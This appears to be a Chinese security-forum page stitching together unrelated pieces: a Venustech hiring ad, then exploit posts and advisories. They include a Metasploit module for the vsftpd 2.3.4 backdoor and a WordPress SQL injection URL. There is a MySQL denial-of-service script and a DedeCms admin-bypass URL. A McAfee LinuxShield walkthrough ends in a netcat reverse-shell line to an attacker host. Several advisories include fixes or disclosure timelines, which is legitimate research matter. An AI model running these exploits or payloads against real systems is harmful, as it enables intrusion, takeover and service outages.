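[Recruitment] [Hiring] Venustech (启明星辰) R&D hiring

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education required: Bachelor's degree
  • Work experience: 2+ years
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • QQ:
  • Security assistant: recruiting/job hunting through the 非安全中国 administrators, QQ group: 57116771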


  • ++++++++++ Notes on Venustech (启明星辰) ++++++++++

    Just send me a site message.

    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Develop and maintain software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming
    2. Skilled with the Linux operating system; proficient in C programming on Linux
    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis
    4. Familiar with network security protocols and with security devices such as routers, switches and firewalls
    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. System testing and integration testing of products
    2. Writing, executing and revising product test cases
    3. Product performance testing
    4. Support and testing for external projects

    Requirements:

    1. Basic TCP/IP knowledge
    2. Solid data-communications fundamentals
    3. Some Linux background
    4. Able to set up and use databases
    5. Familiar with at least one programming language: C/Perl/VBS/TCL
    6. Familiar with test case design, system testing and stress testing
    7. Familiar with firewall principles, with some understanding of firewall features
    8. Some understanding of how network security devices are deployed in a network
    9. Able to use test tools: Loadrunner, packet-analysis software, Spirent or IXIA testers

    III. R&D Center: Security Event Engineer (several openings)

    Responsibilities:

    1. Delivering trojan detection services and web vulnerability scanning services
    2. Technical support for service customers
    3. Research on web-page trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and the like
    4. Routine updating and maintenance of the security event libraries of IDS/IPS/UTM/TDS/WAG/322 and other products
    5. Research on attack techniques, the TCP/IP protocol, and reverse engineering

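    非安全中国 disclaimer: 1. All statements and images in this post are solely the personal opinion of the poster and do not represent the position of this site;
    2. This topic was posted by 小妍; the poster 小妍 complies with the six management rules of the "Copyright and Disclaimer Notice" and enjoys the related rights;
    3. Other organizations or individuals must obtain the consent of the poster 小妍 and of this site before using, reposting or quoting this post;
    4. Parts of this post are reposted from other media and published on this site in order to pass on more information; this does not mean that this site endorses their views or vouches for their accuracy;
    5. If this post infringes the copyright of your site or of any individual, please notify this site immediately; it will be removed promptly, with our sincere apologies;
    6. The administrators and moderators of this site may delete this post without notifying the poster in advance.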

    VSFTPD v2.3.4 Backdoor Command Execution Vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5'],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        # If the backdoor's bind listener on port 6200 is already open, use it directly
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        # Confirm that the service on port 6200 is a shell before handing it to the payload
        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end

    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.

    WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability
    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/

    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    MySQL 5.5.8 Remote Denial of Service Vulnerability

    # Python 2 script
    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print "\n"

    # First packet sent after connecting (login as "root")
    buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    # Second packet: a query command
    buf2=("\x11\x00\x00\x00\x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"


    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "[*] Connect"
        s.send(buf)
        print "[*] Payload 1 sent"
        s.send(buf2)
        print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n"
        s.close()

    if __name__ == "__main__":
        main()
    Installing Linux step by step: setting up the virtual machine

    http://www.sitedir.com.cn/video/4.swf
    DedeCms (织梦) v5.6-5.7 Unauthorized Access Vulnerability
    http://www.XXXX.com/<DedeCms admin directory>/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current CAPTCHA value and you get straight into the site's admin back end.

    This vulnerability can only be exploited if the admin back-end path is known.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
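The difference between the two checks in the DedeCms post above, as an added example (not part of the original post and not DedeCms code): the first loop inspects only top-level request keys, while `CheckRequest` recurses into nested arrays, so it also sees `GLOBALS` and `cfg_` names carried under `_POST[...]`. The function names `flat_check` and `recursive_check`, the sample query strings and the documentation address 192.0.2.10 are constructed for illustration; both functions return a boolean instead of calling `exit()`.

```php
<?php
// Added example: compares the two request checks from the post.
// flat_check() and recursive_check() are hypothetical names; they return
// false where the original code would call exit('Request var not allow!').

const BLOCKED_NAME = '#^(cfg_|GLOBALS)#';

// Original check: looks only at the top-level keys of the request array.
function flat_check(array $request): bool
{
    foreach ($request as $k => $v) {
        $k = (string) $k;
        if (strlen($k) > 0 && preg_match(BLOCKED_NAME, $k)) {
            return false;
        }
    }
    return true;
}

// Replacement check: walks nested arrays and tests every key and every
// scalar value against the same pattern, like CheckRequest() in the post.
function recursive_check($val): bool
{
    if (is_array($val)) {
        foreach ($val as $k => $v) {
            if (!recursive_check((string) $k) || !recursive_check($v)) {
                return false;
            }
        }
        return true;
    }
    $val = (string) $val;
    return !(strlen($val) > 0 && preg_match(BLOCKED_NAME, $val));
}

// Constructed query strings. parse_str() builds the same nested arrays PHP
// builds for request parameters, so "_POST[GLOBALS][cfg_dbhost]" becomes
// ['_POST' => ['GLOBALS' => ['cfg_dbhost' => ...]]].
$samples = [
    'ordinary login'         => 'dopost=login&userid=admin',
    'direct cfg_ override'   => 'cfg_dbhost=192.0.2.10',
    'nested under _POST'     => 'dopost=login&_POST[GLOBALS][cfg_dbhost]=192.0.2.10',
    'value starts with cfg_' => 'keyword=cfg_basehost',
];

printf("%-24s %-10s %s\n", 'request', 'flat', 'recursive');
foreach ($samples as $label => $query) {
    parse_str($query, $request);
    printf(
        "%-24s %-10s %s\n",
        $label,
        flat_check($request) ? 'allowed' : 'blocked',
        recursive_check($request) ? 'allowed' : 'blocked'
    );
}
```

Because the replacement also tests values, a harmless field value that begins with `cfg_` or `GLOBALS` is rejected along with the nested-key case.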

    Installing Linux step by step: setting up the virtual machine tools

    http://www.sitedir.com.cn/video/8.swf
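    Multiple Security Vulnerabilities in the Django Framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Description:

    Django is an open-source web application framework written in Python.
    Django has multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks, or cause denial of service.
    1) When a cache backend is used, an error in session handling in django.contrib.sessions can be exploited to manipulate session information. Successful exploitation requires a known session key and an application that lets the attacker store dictionary-like objects in the cache under a valid session key.
    2) The Django model system includes a field type, URLField, that validates whether a supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it attempts to verify the supplied URL and resolve it. By default the underlying socket has no timeout, so an attacker can exploit this by submitting a crafted URL to consume all server memory, causing denial of service.
    3) An error in the handling of redirect responses when validating URLs supplied to the "URLField" field type lets an attacker return a redirect response pointing to a "file://" URL and so determine whether local files exist on the server.
    4) An error in the handling of the "X-Forwarded-Host" HTTP header when generating full-path URLs for redirect responses lets an attacker carry out cache poisoning attacks.

    References:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/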
    McAfee LinuxShield Local/Remote Code Execution Vulnerability
    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote attack: Yes
    Local overflow: Yes
    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our
    anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack
    Windows-based systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)


    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.


    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
              ="1.0" encoding="UTF-8"?><ns:SiteLists
              xmlns:ns="naSiteLi
              st" GlobalVersion="20030131003110"
              LocalVersion="20091209
              161903" Type="Client"><SiteList
              Default="1" Name="SomeGU
              ID"><HttpSite Type="repository"
              Name="EvilRepo" Order="1
              " Server="<attackerhost>:80"
              Enabled="1" Local="1"><Rela
              tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
              rName></
              UserName><Password
              Encrypted="0"/></HttpSite></SiteList></
              ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
              true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
              DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
              10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
              ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
              file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
              ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
              ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
              .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
              risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
              e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
              .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
              le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
              dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
              e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
              ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
              o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
              .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
              rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
              ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
              00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
              ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
              ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
              nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
              ofile.ODS_99.filter.extensions.type=extension nailsd.profil
              e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
              .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
              action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
              econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
              ss nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
              pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
              mp;exclude:false timetable=type=unscheduled taskResults=0 i
              _lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF


    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---


    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz


    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007


    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
                date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
                2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
                the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory
